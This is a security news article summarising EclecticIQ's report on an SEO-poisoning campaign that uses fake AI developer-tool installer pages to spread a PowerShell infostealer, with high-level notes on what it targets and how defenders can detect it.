Researchers Uncover SEO-Poisoned Sites Delivering Infostealers

Security researchers at EclecticIQ documented an ongoing SEO poisoning campaign that impersonates developer tooling pages for Google and Anthropic, delivering an information-stealing payload to Windows hosts, according to an EclecticIQ intelligence report published in May 2026 and coverage by Infosecurity Magazine. The initial public flag was posted by independent researcher @g0njxa on April 21, 2026, and EclecticIQ says attacker-controlled domains began appearing in early March 2026. Reporting by EclecticIQ and Infosecurity Magazine describes typosquatted domains and search-engine manipulation used to surface fake installer pages that mimic legitimate AI agent installation flows.

EclecticIQ reports the malware executes entirely in memory via PowerShell, targeting Windows endpoints and exfiltrating collected data to an encrypted command-and-control server. The researchers describe broad collection capabilities that include browser-stored credentials and session data for both Chromium-family browsers and Firefox, and extraction of authentication artifacts from collaboration and communication clients. EclecticIQ lists targeted sources of secrets including:

• •Slack, Microsoft Teams, Discord, Zoom, Telegram Desktop and others, where session cookies, local state files and DPAPI-protected keys are collected;
• •OAuth tokens, CI/CD credentials and corporate VPN details, which EclecticIQ highlights as items of particular interest to financially motivated operators.

EclecticIQ also notes the stealer enables arbitrary remote code execution, providing operators a pathway to hands-on-keyboard intrusions after initial compromise.

Campaigns that impersonate developer tooling and package installers commonly exploit search-ranking manipulation because developer workflows often start with a web search. SEO-poisoning attackers benefit from low-cost domain registration and typosquatting to intercept installs, and in-memory PowerShell loaders are a persistent technique to evade disk-based detection. For practitioners, this pattern increases the importance of reproducible, offline-install workflows for critical developer tools and robust endpoint monitoring for in-memory execution chains.

EclecticIQ frames this campaign as part of a broader trend where financially motivated eCrime actors capitalize on enterprises' adoption of AI developer tooling to reach high-value developer workstations. Reporting cites domain choices including .co.uk, .us.com and .us.org as evidence the campaign may be geographically tailored toward users in the US and UK, per EclecticIQ. Public reporting links the discovery timeline to activity beginning in March 2026 and public disclosure in April and May 2026.

Observers should monitor malicious domain takedowns and search-engine remediation, public disclosures from affected platform vendors, and law-enforcement actions targeting infostealer C2 infrastructure. Industry detection signals to follow include spikes in in-memory PowerShell execution correlated with web downloads from newly registered or typosquatted domains, and unexplained OAuth token usage or CI/CD credential attempts after developer workstation browsing activity.